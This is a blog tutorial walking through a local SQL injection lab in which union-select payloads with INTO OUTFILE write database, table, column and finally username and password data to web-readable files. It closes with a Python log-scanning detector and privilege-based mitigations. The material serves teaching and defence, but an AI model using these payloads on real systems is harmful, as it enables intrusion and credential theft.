Dumping Database using Outfile

In our previous article you learned the basic concepts of SQL injection, but in some scenarios you will find that your basic knowledge and tricks fail. Today we are going to use the SELECT … INTO OUTFILE statement, which is the easiest way of exporting a table's records into a text file or Excel file.

This statement allows the user to dump table information very rapidly to a text file on the server machine. SELECT … INTO OUTFILE writes the selected rows to a file and allows the use of column and row terminators to specify the output format. The output file is created directly by the MySQL server, so the filename must be given with the path where the user wants the file to be written on the server host. The file must not already exist on the server; it cannot be overwritten. A user requires the FILE privilege to run this statement.

Let’s start!!

Lesson 7

Open the browser and type the following query in the URL bar:

http://localhost:81/sqli/Less-7/?id=1

From the screenshot, you can read “you are in….. Use outfile”. Now let’s try to break this statement.

OKAY! The query has been broken successfully: we receive an error message when we use a single quote (‘) to break the query, which confirms that it is vulnerable.

http://localhost:81/sqli/Less-7/?id=1'

After a lot of effort, the query finally gets fixed. Notice that the steps for SQL injection are similar to the previous chapter; only the technique used to fix the query is different.

http://localhost:81/sqli/Less-7/?id=1')) --+

Now the following query will dump the result into a text file. Here you need to mention the path where the file is to be written on the server host. The file must not already exist on the server, so always use a new text file for each query instead of overwriting an existing one.

http://localhost:81/sqli/Less-7/?id=1')) union select 1,2,3 into outfile "/xampp/htdocs/sqli/Less-7/hack1.txt" --+

From the screenshot, you can see that it is still showing an error message. Now open another tab to view the output of the query.

http://localhost:81/sqli/Less-7/

Now add the file name hack1.txt to check the output of the above query.

http://localhost:81/sqli/Less-7/hack1.txt

Hence you can see we get the output of the executed query inside a text file. This also saves the hack1.txt file on the server machine.

Execute the following query to retrieve the database name using union injection, writing to a new text file.

http://localhost:81/sqli/Less-7/?id=1')) union select 1,2,database() into outfile "/xampp/htdocs/sqli/Less-7/hack2.txt" --+

http://localhost:81/sqli/Less-7/hack2.txt

Hence you can see we have successfully retrieved security as the database name.

The next query will retrieve all the table names stored in the database, using another text file.

http://localhost:81/sqli/Less-7/?id=1')) union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() into outfile "/xampp/htdocs/sqli/Less-7/hack3.txt" --+

http://localhost:81/sqli/Less-7/hack3.txt

From the screenshot you can read the following table names:

T1: emails
T2: referers
T3: uagents
T4: users

Now we’ll try to find the column names of the users table using the following query.

http://localhost:81/sqli/Less-7/?id=1')) union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' into outfile "/xampp/htdocs/sqli/Less-7/hack4.txt" --+

http://localhost:81/sqli/Less-7/hack4.txt

Hence you can see it contains many columns; I have chosen only two columns for further enumeration.

C1: username
C2: password

Finally, execute the following query to read all the usernames and passwords from the columns of the users table.

http://localhost:81/sqli/Less-7/?id=1')) union select 1,group_concat(username),group_concat(password)from users into outfile "/xampp/htdocs/sqli/Less-7/hack5.txt" --+

http://localhost:81/sqli/Less-7/hack5.txt

From the screenshot, you can read the usernames and passwords saved inside the text file.

Note: you can try the same attack using an Excel file; the attacker only needs to change hack1.txt to hack1.csv, which will save the output into an Excel file.
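The requests in this walk-through leave a clear trace in the web server's access log. The Python sketch below is an added example, not code from the original article: it flags requests whose decoded target contains INTO OUTFILE or INTO DUMPFILE, and any later request for the file that was written. The log layout, the sample lines and the function names are assumptions.

```python
import re
from pathlib import PurePosixPath
from urllib.parse import unquote_plus

# Assumed log layout: client address first, then a quoted "METHOD target HTTP/x.y".
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# INTO OUTFILE / INTO DUMPFILE followed by a quoted server-side path.
OUTFILE_RE = re.compile(r"\binto\s+(outfile|dumpfile)\s*['\"]([^'\"]+)['\"]", re.I)

def fully_decode(target, max_rounds=3):
    """Percent-decode until stable, since a target may be encoded more than once."""
    for _ in range(max_rounds):
        decoded = unquote_plus(target)
        if decoded == target:
            break
        target = decoded
    return target

def find_outfile_writes(log_lines, web_root):
    """Return (writes, fetches): file-write attempts and later requests for those files."""
    writes, fetches, written = [], [], set()
    for line in log_lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.group(1), fully_decode(m.group(2))
        hit = OUTFILE_RE.search(target)
        if hit:
            path = hit.group(2).replace("\\", "/")
            writes.append({"client": client, "keyword": hit.group(1).upper(), "path": path,
                           "in_web_root": path.lower().startswith(web_root.lower())})
            written.add(PurePosixPath(path).name)
        elif PurePosixPath(target.split("?", 1)[0]).name in written:
            fetches.append((client, target))
    return writes, fetches

# Constructed sample lines; the request targets are the URLs from the walk-through above.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /sqli/Less-7/?id=1 HTTP/1.1" 200 512',
    '192.0.2.10 - - [01/Jan/2024:10:00:09 +0000] "GET /sqli/Less-7/?id=1%27))%20union%20select'
    '%201,2,database()%20into%20outfile%20%22/xampp/htdocs/sqli/Less-7/hack2.txt%22%20--+'
    ' HTTP/1.1" 200 530',
    '192.0.2.10 - - [01/Jan/2024:10:00:15 +0000] "GET /sqli/Less-7/hack2.txt HTTP/1.1" 200 14',
]

if __name__ == "__main__":
    writes, fetches = find_outfile_writes(SAMPLE_LOG, "/xampp/htdocs")
    for w in writes:
        print("WRITE", w)
    for client, target in fetches:
        print("FETCH", client, target)
```

On the database side, the write succeeds only if the application's MySQL account holds the FILE privilege and the server's secure_file_priv setting permits the target directory, so revoking FILE from web application accounts closes this path.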

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets.